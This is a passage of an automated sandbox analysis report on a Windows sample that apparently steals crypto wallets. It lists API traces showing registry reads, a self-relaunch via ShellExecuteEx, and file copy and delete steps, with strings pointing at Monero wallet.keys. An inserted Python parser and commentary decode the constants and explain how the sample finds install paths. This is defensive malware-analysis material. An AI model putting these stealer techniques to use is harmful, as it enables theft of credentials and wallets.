                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 9d73ef6f85992bd9003c7cfdf785a9855f7b30b5f4ba06dc3ca6beaa3410230c
                        • Instruction ID: 78d17fdf5dbfab976ed2e2605e8f0fde607b1b77fc10dc52d4c4743e2fd1d050
                        • Opcode Fuzzy Hash: 9d73ef6f85992bd9003c7cfdf785a9855f7b30b5f4ba06dc3ca6beaa3410230c
                        • Instruction Fuzzy Hash: 26616E71A0024DEBEB25EFA4DC95FEE77B5AF54300F008118F98A5F184EB746A06CB90
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0189DB60,00000000,00020119,?), ref: 010140F4
                        • RegQueryValueExA.ADVAPI32(?,0189E518,00000000,00000000,00000000,000000FF), ref: 01014118
                        • RegCloseKey.ADVAPI32(?), ref: 01014122
                        • lstrcat.KERNEL32(?,00000000), ref: 01014147
                        • lstrcat.KERNEL32(?,0189E4D0), ref: 0101415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: ca7155a6982f691579d4e3be169b9fbf1cbf457d51e0169fb1254402743fb1b7
                        • Instruction ID: 49cbc515b52a47411aba1aa21fc9ffc105804554051446bad57d2a46e53bca1e
                        • Opcode Fuzzy Hash: ca7155a6982f691579d4e3be169b9fbf1cbf457d51e0169fb1254402743fb1b7
                        • Instruction Fuzzy Hash: EF41ECBAD40108ABDB24EBA0EC49FFE377DBB58300F04455CA7565B1C4EA759B888BD1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01017E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0188C518,00000000,00020119,?), ref: 01017E5E
                        • RegQueryValueExA.ADVAPI32(?,0189DA60,00000000,00000000,000000FF,000000FF), ref: 01017E7F
                        • RegCloseKey.ADVAPI32(?), ref: 01017E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 51b6368e27e1fb139ba6cefb361eb17e71a0a58b87f7496c30068393e630ca35
                        • Instruction ID: aa5618d7422c315ae793f0e5c0df9f3fbf8b1891b934edecdada3aaabcd616cd
                        • Opcode Fuzzy Hash: 51b6368e27e1fb139ba6cefb361eb17e71a0a58b87f7496c30068393e630ca35
                        • Instruction Fuzzy Hash: A81151B5A80205EBD724CF94E949F7FBBF8FB08710F104119F606A7288D77858008BA1
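The two registry functions above open HKEY_CURRENT_USER (80000001) and HKEY_LOCAL_MACHINE (80000002) with access mask 00020119, and the SHGetFolderPathA subcall in the lstrcat-heavy function earlier on this page asks for CSIDL 0000001C. The parser below is an added example, not part of the report or of the Joe Sandbox tooling: it reads lines in the "APIs" format used on this page and decodes those constants (hive handle, KEY_READ | KEY_WOW64_64KEY, CSIDL_LOCAL_APPDATA). The helper names and the choice of which constants to tabulate are mine; the sample lines are copied from this report.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing and decode the
constants that matter for triage: the hive handle and access mask passed to
RegOpenKeyExA, and the CSIDL passed to SHGetFolderPathA.
Added example, not part of the report; the sample lines are copied from this
report, the helper names are my own, and the constant tables cover only the
values a triage needs."""
import re
from dataclasses import dataclass
from typing import List, Optional

API_LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Predefined registry hive handles (winreg.h).
HKEYS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_BITS = [
    (0x00020000, "STANDARD_RIGHTS_READ"),
    (0x00000001, "KEY_QUERY_VALUE"),
    (0x00000002, "KEY_SET_VALUE"),
    (0x00000004, "KEY_CREATE_SUB_KEY"),
    (0x00000008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x00000010, "KEY_NOTIFY"),
    (0x00000020, "KEY_CREATE_LINK"),
    (0x00000100, "KEY_WOW64_64KEY"),
    (0x00000200, "KEY_WOW64_32KEY"),
]
# CSIDL values (shlobj.h) a stealer typically asks for.
CSIDL = {
    0x05: "CSIDL_PERSONAL",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x26: "CSIDL_PROGRAM_FILES",
    0x28: "CSIDL_PROFILE",
}


@dataclass
class ApiCall:
    api: str
    dll: str
    args: List[Optional[int]]   # 8-digit hex literals as int; '?' and strings as None
    ref: int
    subcall: Optional[int] = None


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Turn one '• Api.DLL(args), ref: addr' line into an ApiCall, or None."""
    m = API_LINE_RE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None)
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("dll"), args, int(m.group("ref"), 16),
                   int(sub, 16) if sub else None)


def decode_access_mask(mask: int) -> List[str]:
    """Name the bits of a registry access mask, collapsing KEY_READ when complete."""
    if (mask & KEY_READ) == KEY_READ:
        return ["KEY_READ"] + [n for b, n in KEY_BITS if mask & b and not (KEY_READ & b)]
    return [n for b, n in KEY_BITS if mask & b]


def describe(call: ApiCall) -> Optional[str]:
    """Human-readable decoding for the calls whose constants carry meaning."""
    if call.api.startswith("RegOpenKeyEx") and len(call.args) >= 4:
        hkey, mask = call.args[0], call.args[3]
        hive = HKEYS.get(hkey, hex(hkey)) if hkey is not None else "?"
        rights = "|".join(decode_access_mask(mask)) if mask is not None else "?"
        return f"{call.api}: hive={hive} access={rights}"
    if call.api.startswith("SHGetFolderPath") and len(call.args) >= 2 and call.args[1] is not None:
        return f"{call.api}: folder={CSIDL.get(call.args[1], hex(call.args[1]))}"
    return None


def summarize(lines: List[str]) -> List[str]:
    """Decode every parseable line; calls without a decoder are listed as api.dll."""
    out: List[str] = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        out.append(describe(call) or f"{call.api}.{call.dll}")
    return out


# Lines copied from this report's function listing.
REPORT_LINES = [
    "• RegOpenKeyExA.ADVAPI32(80000001,0189DB60,00000000,00020119,?), ref: 010140F4",
    "• RegOpenKeyExA.ADVAPI32(80000002,0188C518,00000000,00020119,?), ref: 01017E5E",
    "• Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B",
    "• wsprintfA.USER32 ref: 010192C7",
]

if __name__ == "__main__":
    for s in summarize(REPORT_LINES):
        print(s)
```

The KEY_WOW64_64KEY bit is the detail worth noticing: the sample is a 32-bit process (it launches the SysWOW64 PowerShell), so without that flag its HKLM reads would be redirected to WOW6432Node; with it, it reads the native 64-bit view, which is where a 64-bit browser or wallet client keeps its install path. Arguments shown as "?" in the report are values the static pass could not resolve, and the parser keeps them as None rather than guessing.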
                        APIs
                        • StrStrA.SHLWAPI(0189E440,?,?,?,0101140C,?,0189E440,00000000), ref: 0101926C
                        • lstrcpyn.KERNEL32(0124AB88,0189E440,0189E440,?,0101140C,?,0189E440), ref: 01019290
                        • lstrlen.KERNEL32(?,?,0101140C,?,0189E440), ref: 010192A7
                        • wsprintfA.USER32 ref: 010192C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: d7df27f64175195e12e5790bbd8addb94df2812bf761519abcd737a1d099d5ca
                        • Instruction ID: 114a30ccb830fd338e500fbb3e9be5a2f448927aa5ad3d16b256ae9768aac4cd
                        • Opcode Fuzzy Hash: d7df27f64175195e12e5790bbd8addb94df2812bf761519abcd737a1d099d5ca
                        • Instruction Fuzzy Hash: AF011E75540108FFDB18DFECD998EAE7BB9FB44354F10854CF94A8B208D635AA40CB90
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 010012B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 010012BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 010012D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 010012F5
                        • RegCloseKey.ADVAPI32(?), ref: 010012FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: a2bbfdc48e56a474c68cb492164cbc31cc0d7bf90590d0aa4ab587a5b29b1d8a
                        • Instruction ID: b6cbc84cb5709dd9fdaeb17e104df1fbe2042f6f2dbe96394608cd76df9de599
                        • Opcode Fuzzy Hash: a2bbfdc48e56a474c68cb492164cbc31cc0d7bf90590d0aa4ab587a5b29b1d8a
                        • Instruction Fuzzy Hash: E301E1B9A40208BBEB14DFE4E84DFAEB7BCEB48705F108159FA0697284D6759A018F50
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 3ef005eca2ca3de36b32f05c64510144f495c9ed49a14421c952d4bf96f4c0ed
                        • Instruction ID: 2cb22173df6cd459aa6aaa72d7f6b465fd66aa306fad05e0ca6fbfaafe16105e
                        • Opcode Fuzzy Hash: 3ef005eca2ca3de36b32f05c64510144f495c9ed49a14421c952d4bf96f4c0ed
                        • Instruction Fuzzy Hash: 2641187114079C5EEB218B288D88FFB7BF9AB45304F1844E8DACA86086D275DA44CF64
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 01016663
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 01016726
                        • ExitProcess.KERNEL32 ref: 01016755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 34df825bfb7b471b9b2c289f414944cbebdd6e8e30c53aafe779d4d3720344d9
                        • Instruction ID: 533f9c84a453a5469a52fb9b29b3cc1969e23c04b61e41c68b152cd6e67428a8
                        • Opcode Fuzzy Hash: 34df825bfb7b471b9b2c289f414944cbebdd6e8e30c53aafe779d4d3720344d9
                        • Instruction Fuzzy Hash: 4B312CB1D01218ABDB14EB90ED94FDEB778AF14310F404189E24A67184DF786B49CF65
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01020E28,00000000,?), ref: 0101882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01018836
                        • wsprintfA.USER32 ref: 01018850
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: c6915b84dbd423a0d644be7684df8df09c68336120c1b5c9d8b1217a583dac72
                        • Instruction ID: 7ed068446d400a0f97304ade4ddcc892169d9e203f40c55f5dea7dd3cbb112b6
                        • Opcode Fuzzy Hash: c6915b84dbd423a0d644be7684df8df09c68336120c1b5c9d8b1217a583dac72
                        • Instruction Fuzzy Hash: F82124B5A80204EFEB14DFD4ED49FAEBBB8FB48711F104119F606A7284C7799901CBA0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0101951E,00000000), ref: 01018D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01018D62
                        • wsprintfW.USER32 ref: 01018D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: ba28e135c9027fd2bf1760f7f4903fac401af9d19f3fdc1686e054dbc00014f9
                        • Instruction ID: fe4e10204cc1e445f20e1dc32f0b467bc324b5676807ca8ee833b98f6ac35114
                        • Opcode Fuzzy Hash: ba28e135c9027fd2bf1760f7f4903fac401af9d19f3fdc1686e054dbc00014f9
                        • Instruction Fuzzy Hash: ADE0E675A80208BBD724DB94E90DE5D77B8EB44701F004155FD4A97244D9715E109B55
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0100A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0100A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0100A6BC
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0100A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
